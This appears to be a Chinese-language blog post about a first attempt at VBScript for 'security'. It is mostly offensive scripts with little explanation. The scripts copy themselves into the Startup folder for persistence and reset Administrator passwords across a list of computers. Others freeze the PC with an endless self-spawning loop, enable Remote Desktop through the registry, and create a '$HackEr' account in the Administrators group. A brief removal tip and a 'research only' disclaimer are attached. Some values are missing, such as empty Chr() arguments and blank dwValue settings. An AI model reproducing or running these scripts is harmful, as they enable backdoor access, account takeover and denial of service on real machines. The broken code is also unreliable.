set fso = createobject("scripting.filesystemobject")
set ws = createobject("wscript.shell")
Msgbox"Messed up"
pt = ws.specialfolders("startup") & "\"
set file = fso.getfile(wscript.scriptfullname)
file.copy pt set copy1=createobject("scripting.filesystemobject")
copy1.getfile(wscript.scriptfullname).copy("E:\huan.vbs") Dim delayer
Set delayer = CreateObject("WScript.Shell")
WScript.sleep
delayer.Run """E:\huan.vbs""", , FALSE
注册到启动项,可以通过win+X-->运行 msconfig 进入 启动-->任务管理器 禁用 或者 直接删除源文件停止。
第一次尝试VBscript,发现这玩意儿做安全实在是好用,不过,不能乱玩儿,容易出事儿....
比如:修改Admin的密码
Dim WshShell, oExec
Set wshShell = CreateObject("WScript.Shell")
Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objInputFile = objFSO.OpenTextFile("D:\test\computer.txt",)
do until objInputFile.AtEndofStream
strcomputer = objInputFile.ReadLine
Set objUser = GetObject("WinNT://" & strComputer & "/Administrator, user")
objUser.SetPassword "new password"
objUser.SetInfo
loop
比如:卡死电脑
Do
CreateObject("WScript.Shell").Run Chr() & WScript.ScriptFullName & Chr()
Loop
再比如:开启远程桌面
on error resume next const HKEY_LOCAL_MACHINE = &H80000002 strComputer = "." Set StdOut = WScript.StdOut
Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
strComputer & "\root\default:StdRegProv") strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
strValueName = "fDenyTSConnections"
dwValue =
oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
strValueName = "PortNumber"
dwValue =
oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
strValueName = "PortNumber"
dwValue =
oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue on error resume next dim username,password:If Wscript.Arguments.Count Then:username=Wscript.Arguments():password=Wscript.Arguments():Else:username="$HackEr":password="":end if:set wsnetwork=CreateObject("WSCRIPT.NETWORK"):os="WinNT://"&wsnetwork.ComputerName:Set ob=GetObject(os):Set oe=GetObject(os&"/Administrators,group"):Set od=ob.Create("user",username):od.SetPassword password:od.SetInfo:Set of=GetObject(os&"/"&username&",user"):oe.Add(of.ADsPath)*wscript.echo of.ADsPath
(仅用于研究,请勿乱用,自己电脑实验请忽略)